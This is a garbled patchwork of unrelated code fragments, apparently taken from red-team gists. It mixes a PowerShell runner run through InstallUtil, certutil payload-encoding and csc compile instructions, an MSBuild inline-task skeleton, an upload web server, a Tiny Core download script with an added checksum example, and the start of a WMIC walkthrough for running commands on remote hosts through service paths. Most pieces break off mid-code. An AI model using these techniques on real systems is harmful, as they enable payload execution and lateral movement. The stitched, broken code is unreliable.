using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
#!/bin/bash
echo 'Enter device mount point (example "/media/root/960fec6a-fdf0-429d-a35c-5c7f4f6af5a4")'
read -r mount
#download necessary packages into the Tiny Core extension directory
#(note: fetched over plain HTTP with no integrity check on the .tcz files)
mkdir -p "$mount/tce/optional"
wget http://distro.ibiblio.org/tinycorelinux/8.x/x86/tcz/python.tcz -P "$mount/tce/optional/"
wget http://distro.ibiblio.org/tinycorelinux/8.x/x86/tcz/openssl.tcz -P "$mount/tce/optional/"
wget http://distro.ibiblio.org/tinycorelinux/8.x/x86/tcz/ntfs-3g.tcz -P "$mount/tce/optional/"
wget http://distro.ibiblio.org/tinycorelinux/8.x/x86/tcz/scsi-4.8.17-tinycore.tcz -P "$mount/tce/optional/"
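The script above pulls extensions over plain HTTP and writes whatever the mirror returns straight into tce/optional. The added example below is not part of the original gist: it fetches each .tcz together with the .tcz.md5.txt file Tiny Core repositories publish next to every extension (assumed to be in md5sum format, `<hash>  <name>.tcz`), verifies the hash, and discards the package on mismatch. The MIRROR variable, the function names and the demo file in the usage note are my own choices.

```shell
#!/bin/sh
# Added example, not from the original gist: download a Tiny Core .tcz
# extension plus its published .tcz.md5.txt and verify before accepting it.
# Assumption: the mirror lays out <pkg>.tcz and <pkg>.tcz.md5.txt side by
# side, the md5 file being one md5sum-style line: "<hash>  <pkg>.tcz".

MIRROR="${MIRROR:-http://distro.ibiblio.org/tinycorelinux/8.x/x86/tcz}"

# verify_tcz DIR NAME
#   0 = DIR/NAME.tcz matches DIR/NAME.tcz.md5.txt
#   1 = hash mismatch or empty md5 file
#   2 = one of the two files is missing
verify_tcz() {
    dir=$1; name=$2
    [ -f "$dir/$name.tcz" ] && [ -f "$dir/$name.tcz.md5.txt" ] || return 2
    expected=$(awk 'NR==1 {print $1}' "$dir/$name.tcz.md5.txt")
    actual=$(md5sum "$dir/$name.tcz" | awk '{print $1}')
    [ -n "$expected" ] && [ "$expected" = "$actual" ]
}

# fetch_tcz DIR NAME
#   Downloads NAME.tcz and NAME.tcz.md5.txt into DIR and verifies them.
#   A package that fails verification is deleted so it never lands in
#   tce/optional where Tiny Core would load it at boot.
fetch_tcz() {
    dir=$1; name=$2
    mkdir -p "$dir"
    wget -q "$MIRROR/$name.tcz" -P "$dir" || return 1
    wget -q "$MIRROR/$name.tcz.md5.txt" -P "$dir" || { rm -f "$dir/$name.tcz"; return 1; }
    if verify_tcz "$dir" "$name"; then
        echo "ok: $name.tcz"
    else
        echo "checksum mismatch: $name.tcz (removed)" >&2
        rm -f "$dir/$name.tcz"
        return 1
    fi
}

# Usage, mirroring the original script's prompt (not executed here):
#   printf 'Enter device mount point: '; read -r mount
#   for p in python openssl ntfs-3g scsi-4.8.17-tinycore; do
#       fetch_tcz "$mount/tce/optional" "$p" || exit 1
#   done
```

The md5 file comes from the same unauthenticated mirror as the package, so this catches truncated or corrupted downloads, not a hostile mirror or an on-path attacker rewriting the HTTP response; for that you need a transport you trust (an HTTPS mirror) or a checksum obtained out of band.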
function New-InstallUtilBatchFile
{
<##>
#You must provide an encoded payload using certutil -encode for the InFilePath.
#certutil -encode payload.exe payload.txt
#For compiling w/ a managed powershell runner
# C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:payload.exe payload.cs
[CmdletBinding()]
param
(
#!/usr/bin/env python3
"""Simple HTTP Server With Upload.
This module builds on http.server (BaseHTTPServer in Python 2) by implementing
the standard GET and HEAD requests in a fairly straightforward manner.
see: https://gist.github.com/UniIsland/3346170
"""
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="DemoClass">
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Code Type="Class" Language="cs">
As always, only for use on networks you own or have permission to test against.
Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell), but from the command line, using WMIC to run commands on other systems remotely.
If you need to run multiple commands, SCShell will probably be more convenient, as it automates the steps below. For one-offs, this works fine as well.
The process involves a total of four commands, three of which can be combined on the command line into one block. Note that the credentials are passed as wmic.exe arguments, so they will show up in any process command-line logging on the machine you run this from.
Step 1: Get the current pathName of the target service so it can be restored once our command has run (in our case XblAuthManager):
wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName